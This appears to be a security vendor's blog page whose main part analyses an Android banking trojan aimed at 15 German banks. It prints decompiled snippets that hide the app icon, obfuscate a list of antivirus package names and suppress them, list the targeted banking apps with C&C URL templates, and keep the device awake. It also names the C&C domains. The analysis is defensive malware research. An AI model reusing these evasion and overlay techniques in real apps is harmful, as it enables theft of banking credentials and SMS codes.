What is Firmware Over the Air FOTA?

The recent data theft incident involving ADUPS technologies has brought into focus FOTA, which stands for Firmware Over the Air. For many, this is a new terminology concept and a whole new concept. Most consumers are familiar with downloading software updates to a phone or computer. But firmware downloads must be handled differently because they deal with different components and operations on a device.

Firmware Over-The-Air (FOTA) is a Mobile Software Management (MSM) technology that wirelessly upgrades the operating firmware of a mobile device. FOTA-capable phones download upgrades directly from the service provider. The process usually takes three to 10 minutes, depending on connection speed and file size. ADUPS is a service provider, and provides FOTA service for hundreds of companies including ZTE, Huawei, and BLU Products.

See our infographic to learn more about how FOTA works.

Trustlook Releases ADUPS Vulnerability Detector

Trustlook has released a new feature in its Trustlook Mobile Security app that identifies the presence of rogue firmware from Shanghai ADUPS Technology Co. This potentially dangerous firmware comes pre-installed on some Android phones, and can monitor text messages, phone call histories, and details of how the phone is being used all without the user’s permission.

Until now, there was no easy way for users to check for this vulnerability. Only the most technically sophisticated users could identify the threat by observing the network traffic. Now, Trustlook is providing an easy-to-use, single-click ADUPS Vulnerability detector within the Trustlook Mobile Security app.

The Trustlook Mobile Security app is available to download for free from Google Play. It currently checks for all known versions of the ADUPS system apps that conduct aggressive data collection, with more being added as they are discovered.

We have also created an infographic with more details on the ADUPS threat.

Trustlook joins VirusTotal to Fight Malware

Trustlook is pleased to join VirusTotal in the fight against malware. VirusTotal is the leading online platform to analyze malware. VirusTotal chose to work with Trustlook because of Trustlook’s superior machine learning technology.

About VirusTotal

VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal’s mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.


Banking Trojan Targets German Financial Institutions

This report summarizes a mobile malware attack recently discovered by Trustlook Labs. Based on the information we obtained, Trustlook can confirm that various financial institutions across the world have been targeted, with Germany being the most targeted country in the attack.

Trustlook Labs investigated the malware’s attack vectors as well as the communication between the compromised devices and their command-and-control (C&C) server infrastructure. The attack targets 15 financial institutions in Germany. Based on our findings, we expect that mobile users of other regional financial services institutions will face similar threats.

The malware is likely distributed through a link embedded in an email or text message, or from a phishing website. The user downloads an app and “sideloads” it since the app is not directly from the Google Play Store.

The malware masquerades as an Email client and comes with a corresponding icon.


The app forces the user to grant device administrator access.


The malware then calls setComponentEnabledSetting() to hide the icon:

  private void invoke_hideApp2()


    getApplicationContext().getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);



  public PendingIntent f()


    Intent localIntent = new Intent(n);

    return PendingIntent.getBroadcast(getApplicationContext(), 0, localIntent, 0);



The malware hides strings by inserting characters in a random location inside the string. For example:

public static final String[] d = { “c!o!m!.qiho!o.!s!ec!ur!i!t!y!”.replace(“!”, “”), “co!m.!an!tiv!i!r!u!s”.replace(“!”, “”), “co!m!.t!heg!old!e!ng!o!o!da!pp!s!.!ph!on!e!_c!l!e!aning!_v!iru!s_f!r!e!e!.c!l!ean!e!r.!b!oos!t!er!”.replace(“!”, “”), “c!om!.antiv!ir!us.!table!t!”.replace(“!”, “”), “c!om!.!n!qm!o!b!il!e.!an!t!i!v!i!r!u!s20!”.replace(“!”, “”), “co!m.km!s!.!f!r!ee”.replace(“!”, “”), “co!m!.!dr!w!e!b!”.replace(“!”, “”), “co!m!.!t!rus!t!l!o!ok!.!a!nt!i!v!i!r!u!s!”.replace(“!”, “”), “c!om!.!es!e!t.e!m!s2!.gp!”.replace(“!”, “”), “com!.e!set!.!e!m!s.!g!p!”.replace(“!”, “”), “c!om.s!y!ma!nte!c.mo!b!i!le!s!e!cur!it!y!”.replace(“!”, “”), “c!om.!d!u!ap!p!s.!a!n!t!i!vir!us”.replace(“!”, “”), “c!o!m.!p!ir!i!f!or!m!.!c!c!l!ea!ner!”.replace(“!”, “”), “c!o!m!.!c!l!ean!mast!e!r!.!m!guar!d”.replace(“!”, “”), “c!o!m.clea!n!m!ast!er.s!e!cu!ri!t!y”.replace(“!”, “”), “c!o!m!.!s!on!y!er!i!c!sso!n!.!m!t!p!.!ext!en!s!ion.f!ac!to!r!yr!es!et”.replace(“!”, “”), “com!.!a!n!hlt!.!ant!i!vi!ru!sp!r!o!”.replace(“!”, “”), “co!m.c!l!e!a!n!m!as!ter.!s!d!k”.replace(“!”, “”), “c!om!.!qi!ho!o!.!se!cu!rit!y.!l!i!te”.replace(“!”, “”), “o!e!m!.!a!nt!iv!i!r!us”.replace(“!”, “”), “c!om!.!ne!tqi!n!.an!ti!v!ir!u!s!”.replace(“!”, “”), “d!r!oi!d!d!u!d!es!.!b!es!t!.!an!i!tv!i!r!u!s!”.replace(“!”, “”), “c!om.b!i!t!d!ef!e!nd!e!r.!a!nt!iv!ir!u!s!”.replace(“!”, “”), “c!o!m.!dia!nx!ino!s!.!op!ti!m!iz!er!.d!upl!a!y!”.replace(“!”, “”), “c!o!m!.c!l!ea!nma!ster.!mg!ua!rd_x!8!”.replace(“!”, “”), “c!om!.w!o!mb!oi!dsy!st!e!m!s!.!an!t!i!v!i!ru!s.s!e!cu!r!i!ty.!a!n!d!r!oi!d”.replace(“!”, “”), “co!m.!nq!mob!il!e.a!nt!iv!ir!u!s!2!0!.!cl!a!rob!r!”.replace(“!”, “”), “c!o!m!.!r!e!f!e!r!p!l!i!s!h!.!V!iru!s!R!e!mo!v!al!F!o!r!A!ndr!o!i!d”.replace(“!”, “”), “c!o!m.!c!l!e!a!n!ma!s!t!er!.b!o!o!s!t!”.replace(“!”, “”), “co!m!.z!r!gi!u!.!a!nti!v!ir!u!s!”.replace(“!”, “”), “a!v!g!.!a!n!t!i!vi!r!us”.replace(“!”, “”) };

From the above string, the malware retrieves the process names of widely used mobile security products, including Trustlook Antivirus:

  • com.qihoo.security
  • com.antivirus
  • com.thegoldengoodapps.phone_cleaning_virus_free.cleaner.booster
  • com.antivirus.tablet
  • com.nqmobile.antivirus20
  • com.kms.free
  • com.drweb
  • com.trustlook.antivirus
  • com.eset.ems2.gp
  • com.eset.ems.gp
  • com.symantec.mobilesecurity
  • com.duapps.antivirus
  • com.piriform.ccleaner
  • com.cleanmaster.mguard
  • com.cleanmaster.security
  • com.sonyericsson.mtp.extension.factoryreset
  • com.anhlt.antiviruspro
  • com.cleanmaster.sdk
  • com.qihoo.security.lite
  • oem.antivirus
  • com.netqin.antivirus
  • droiddudes.best.anitvirus
  • com.bitdefender.antivirus
  • com.dianxinos.optimizer.duplay
  • com.cleanmaster.mguard_x8
  • com.womboidsystems.antivirus.security.android
  • com.nqmobile.antivirus20.clarobr
  • com.referplish.VirusRemovalForAndroid
  • com.cleanmaster.boost
  • com.zrgiu.antivirus
  • avg.antivirus

If any one of the above active processes is found, the malware immediately launches the home screen to suppress the process.

    List localList = com.jaredrummler.android.processes.a.a(paramContext);

    if ((e.g(paramContext)) && (!i.a(com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.a, localList, null)))





    if (com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d.length > 0) // list of security product strings


      int i = 0;

      while (i < com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d.length)


        if (i.a(com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.d[i], localList, null)) // i.a(String arg2, List arg3, Context arg4) search the active process under “/proc”


          i.b(paramContext); // Launch home screen



        i += 1;




  public static void b(Context paramContext)


    Intent localIntent = new Intent(“android.intent.action.MAIN”);





The malware sends out system information, and all communications are SSL encrypted. The following is an example of decrypted traffic:


The malware then monitors the process related to the financial institutions. The process lists are taken from the following string:

public static final String b = “[{“to”: “de.postbank.finanzassistent”,”body”: “%API_URL%%PARAM%17”},{“to”: “de.fiducia.smartphone.android.banking.vr”,”body”: “%API_URL%%PARAM%16”},{“to”: “mobile.santander.de”,”body”: “%API_URL%%PARAM%18”},{“to”: “de.adesso.mobile.android.gad”,”body”: “%API_URL%%PARAM%68”},{“to”: “com.starfinanz.smob.android.sfinanzstatus”,”body”: “%API_URL%%PARAM%11”},{“to”: “com.starfinanz.mobile.android.dkbpushtan”,”body”: “%API_URL%%PARAM%69”},{“to”: “com.isis_papyrus.raiffeisen_pay_eyewdg”,”body”: “%API_URL%%PARAM%10”},{“to”: “com.starfinanz.smob.android.sbanking”,”body”: “%API_URL%%PARAM%70”},{“to”: “de.dkb.portalapp”,”body”: “%API_URL%%PARAM%15”},{“to”: “com.ing.diba.mbbr2″,”body”: “%API_URL%%PARAM%9”},{“to”: “de.ing_diba.kontostand”,”body”: “%API_URL%%PARAM%67”},{“to”: “de.commerzbanking.mobil”,”body”: “%API_URL%%PARAM%13”},{“to”: “de.consorsbank”,”body”: “%API_URL%%PARAM%14”},{“to”: “com.db.mm.deutschebank”,”body”: “%API_URL%%PARAM%8”},{“to”: “de.comdirect.android”,”body”: “%API_URL%%PARAM%12″}]”.replace(“%PARAM%”, “njs2/?m=”);

The affected banking apps are:

  • de.postbank.finanzassistent
  • de.fiducia.smartphone.android.banking.vr
  • mobile.santander.de
  • de.adesso.mobile.android.gad
  • com.starfinanz.smob.android.sfinanzstatus
  • com.starfinanz.mobile.android.dkbpushtan
  • com.isis_papyrus.raiffeisen_pay_eyewdg
  • com.starfinanz.smob.android.sbanking
  • de.dkb.portalapp
  • com.ing.diba.mbbr2
  • de.ing_diba.kontostand
  • de.commerzbanking.mobil
  • de.consorsbank
  • com.db.mm.deutschebank
  • de.comdirect.android

The malware then searches for the related active processes. Once found, the malware constructs the corresponding URL used to retrieve the web interface from the C&C server. During this time, the malware uses an AlarmManager to keep the screen and WiFi on:

  protected void onCreate(Bundle paramBundle)



    if (i.c(getApplicationContext())) {



    setContentView(2130903065); // layout.activity_main

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.j(this, com.jlkbvcbyjjscyxvsudkmjabndnkrbn.a.a.b); // process string/URL list store into  JSON format

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.h(this, “”); // root_phone

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.d(this, false); //app_kill

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.c(this, false); //free_dialog

    com.jlkbvcbyjjscyxvsudkmjabndnkrbn.api.e.g(this, false);

    this.p = new a(this);

    Settings.System.putInt(getContentResolver(), “wifi_sleep_policy”, 2);

    if (MainService.c == null)


      MainService.c = ((PowerManager)getSystemService(“power”)).newWakeLock(1, MainService.b);


      MainService.d = ((WifiManager)getSystemService(“wifi”)).createWifiLock(1, b.aP);

      if (!MainService.d.isHeld()) {




Once the user starts the banking app, the malware contacts its C&C server to receive data used to create and activate another WebView and entice the user to enter banking credentials. For example, if the user opens the banking app “mobile.santander.de”, the malware retrieves the data by issuing the following request:


The following is the comparison of the real banking interface and the fake one:

 image05   image01

The collected credentials will be sent to the same C&C server. The malware can accept the commands from the server to receive and send SMS messages. The malware can intercept SMS and can steal your two-factor authentication PIN to complete a transaction without you realizing it.

Currently, the malware uses three servers:

  • polo777555lolo.at
  • polo569noso.at
  • wahamer8lol77j.at

The domains are registered by “Koste Karima” in Merdzavan, a village in the Armavir Province of Armenia, the current IP is located in Germany:


The malware calls getNetworkCountryIso()  and getSimCountryIso () to get the device and SIM card country code. It stops running if any one of the following country codes is found:

  • ru
  • rus
  • kz
  • ua
  • by
  • az
  • am
  • kg
  • md
  • tj
  • tm
  • uz
  • us

The attack is launched by cyber criminals driven by financial incentives. It scams people into giving up their banking login credentials and other personal data by displaying overlays that look nearly identical to banking apps’ login pages. Its malicious behavior is spreading to additional countries, expanding its footprint at a rapid pace. But with deep knowledge of the malware behavior, Trustlook’s anti-threat platform can effectively protect our users against invasion.